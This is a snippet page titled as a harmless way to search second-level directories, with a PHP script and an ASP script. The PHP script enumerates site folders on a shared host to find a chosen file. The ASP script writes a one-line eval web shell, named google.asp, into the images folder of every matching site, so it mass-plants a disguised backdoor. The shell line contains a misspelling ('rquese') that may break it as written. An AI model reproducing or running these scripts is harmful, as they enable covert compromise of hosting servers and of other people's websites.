Of Stack

php is a little thing looking for a second level directory

  • 2020-05-19 04:20:12
  • OfStack
php version 
 
<?php 
set_time_limit(0); 
$path = 'D:/Hosting'; 
$somefile = $_GET['key']; 
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt'; 
if (!isset($_SERVER['PHP_AUTH_USER'])) { 
header('WWW-Authenticate: Basic realm="My Realm"'); 
header('HTTP/1.0 401 Unauthorized'); 
echo 'Text to send if user hits Cancel button'; 
exit; 
} else { 
if(is_dir($path) && is_readable($path)) 
{ 
$path2 = ''; 
$handle = opendir($path); 
while(false !== ($filename = readdir($handle))) 
{ 
if($filename{0} != $_GET['dir']) 
{ 
continue; 
} 
/* 
if($filename{1} != $_GET['two']) 
{ 
continue; 
} 
*/ 
//$path2 = $path.'/'.$filename.'/html'; 
$path2 = $path.'/'.$filename; 
if(is_dir($path2) && is_readable($path2)) 
{ 
@$handle2 = opendir($path2); 
while(false !== ($filename2 = readdir($handle2))) 
{ 
if($filename2 == $somefile) 
{ 
//echo'[+]Found !'.$filename2."\n"; 
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."\n",FILE_APPEND); 
} 
} 
@closedir($handle2); 
} 
} 
file_put_contents($logfile,'[*]LAST '.$path2."\n",FILE_APPEND); 
closedir($handle); 
} 
}

asp version 
 
<% 
Server.ScriptTimeout=500000000 
key = Trim(Request.QueryString("key")) 
msg=" <% eval(rquese(Chr(35)))%" &">" 
Set FSO=Server.CreateObject("Scripting.FileSystemObject") 
Set ServerFolder=FSO.GetFolder("C:\intel") 
Set ServerFolderList=ServerFolder.subfolders 
For Each ServerFileEvery IN ServerFolderList 
' Response.write ServerFileEvery&"</br>" 
If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then 
Set sServerFolder=FSO.GetFolder(ServerFileEvery) 
Set sServerFolderList=sServerFolder.subfolders 
For Each sServerFileEvery IN sServerFolderList 
If LCase(sServerFileEvery.name) = "images" Then 
StreamSaveToFile sServerFileEvery & "\google.asp", msg, "UTF-8" 
End If 
Next 
End If 
Next 
Function StreamSaveToFile(sPath, sContent, sCharSet) 
Dim oStream 
If(InStr(sPath, ":") <= 0)Then 
sPath = Replace(sPath, ",", " . ") 
sPath = Server.MapPath(sPath) 
sPath = Replace(sPath, " . ", ",") 
End If 
Set oStream = Server.CreateObject("Adodb.Stream") 
With oStream 
.Type = 2 
.Mode = 3 
.Open 
.Charset = sCharSet 
.WriteText sContent 
.SaveToFile sPath, 2 
.Close 
End With 
Set oStream = Nothing 
End Function 
%>
Related articles: